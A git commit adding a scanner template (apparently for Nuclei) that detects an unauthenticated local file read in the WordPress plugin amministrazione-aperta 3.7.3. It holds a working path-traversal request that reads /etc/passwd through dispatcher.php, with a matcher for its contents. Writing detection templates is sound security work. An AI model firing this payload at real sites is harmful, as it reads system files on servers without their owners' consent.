Create amministrazione-aperta-lfi.yaml
parent
64d302f963
commit
613a5800ae
|
@ -0,0 +1,23 @@
|
|||
id: candidate-application-lfi
|
||||
|
||||
info:
|
||||
name: WordPress Plugin amministrazione-aperta 3.7.3 - Unauthenticated Local File Read
|
||||
author: daffainfo,Splint3r7
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/50838
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue